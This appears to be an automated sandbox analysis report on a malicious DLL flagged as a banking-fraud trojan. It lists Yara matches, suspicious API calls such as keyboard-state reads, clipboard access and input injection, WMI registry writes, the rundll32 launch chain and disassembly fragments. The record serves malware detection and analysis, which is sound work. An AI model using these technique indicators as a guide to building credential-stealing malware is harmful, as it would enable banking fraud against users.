                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E33B10 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E34154 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
                      Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00730108 GetProcessUIContextInformation,GetRawInputData,GetSystemMenu,Sleep,GetUserObjectInformationW,GetWindowBand,GetWindowCompositionAttribute,GetWindowFeedbackSetting,GetWindowMinimizeRect,ImpersonateDdeClientWindow,GetMenuBarInfo,InitializeInputDeviceInjection,GetMenuBarInfo,InitializePointerDeviceInjectionEx,InjectDeviceInput,InjectGenericHidInput,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00E57B64 GetKeyboardState,

                      E-Banking Fraud

                      Source: Yara match File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
                      Source: Yara match File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: hFGZpat9Mf.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_007284AC CheckMenuItem,ExitWindowsEx,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0076B448
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E7B448
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E41FAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01082244
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00ED17C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 007064B8 appears 164 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 00706408 appears 48 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 00704068 appears 47 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00E16408 appears 48 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00E164B8 appears 164 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0072A41C NtdllDefWindowProc_A,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0074A9F4 NtdllDefWindowProc_A,GetCapture,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E3A41C NtdllDefWindowProc_A,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00E5A9F4 NtdllDefWindowProc_A,GetCapture,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010814BA SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01082465 NtQueryVirtualMemory,
                      Source: hFGZpat9Mf.dllStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: fadfadfadad.dll
                      Source: hFGZpat9Mf.dllVirustotal: Detection: 20%
                      Source: hFGZpat9Mf.dllReversingLabs: Detection: 32%
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER410A.tmp
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@6/6@4/7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00708912 GetDiskFreeSpaceA,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_007210CC GetLastError,FormatMessageA,
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3272
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00716C2C FindResourceA,
                      Source: C:\Windows\System32\loaddll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.261009852.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdbl source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: version.pdb` source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdbv source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdbj source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdbr source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: comctl32v582.pdbg source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0076B448 push dword ptr [0076FF08h]; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_007080C0 push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0070E154 push 0070E180h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0071611C push ecx; mov dword ptr [esp], edx
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072A1E4 push 0072A23Dh; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_007061A2 push 007061D0h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_007061A4 push 007061D0h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0071627C push ecx; mov dword ptr [esp], edx
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0071E254 push 0071E280h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00716238 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0070621C push 00706248h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_007182BC push ecx; mov dword ptr [esp], ecx
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00714558 push 007145A5h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072C64C push 0072C6C1h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00714610 push 0071463Ch; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072C6C4 push 0072C71Dh; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072A85C push 0072A89Fh; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072A8D4 push 0072A900h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0071C8C0 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072A90C push 0072A944h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072A9A0 push 0072A9CCh; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072AA70 push 0072AAA3h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072AAD0 push 0072AAFCh; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00728AD4 push 00728B12h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00728B54 push 00728B8Ch; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072AB20 push 0072AB63h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00728B1C push 00728B48h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072ABEC push 0072AC38h; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072AB88 push 0072ABCBh; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072AC44 push 0072AC8Fh; ret
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00706CD8 push ecx; mov dword ptr [esp], eax
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0072921C CreatePopupMenu,MITGetCursorUpdateHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetDebugErrorLevel,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,DialogBoxIndirectParamW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,MITUpdateInputGlobals,

                      Hooking and other Techniques for Hiding and Protection

Source: Yara match | File source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 988, type: MEMORYSTR
Source: Yara match | File source: 3.2.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ee0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.9e0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ed0184.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.9e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2500000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.rundll32.exe.1080000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.890184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.1080000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ee0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2a094a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.8a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.2a094a0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.rundll32.exe.ed0184.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00721174 IsIconic,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E37170 IsIconic,GetWindowPlacement,GetWindowRect,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_00E5D24C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
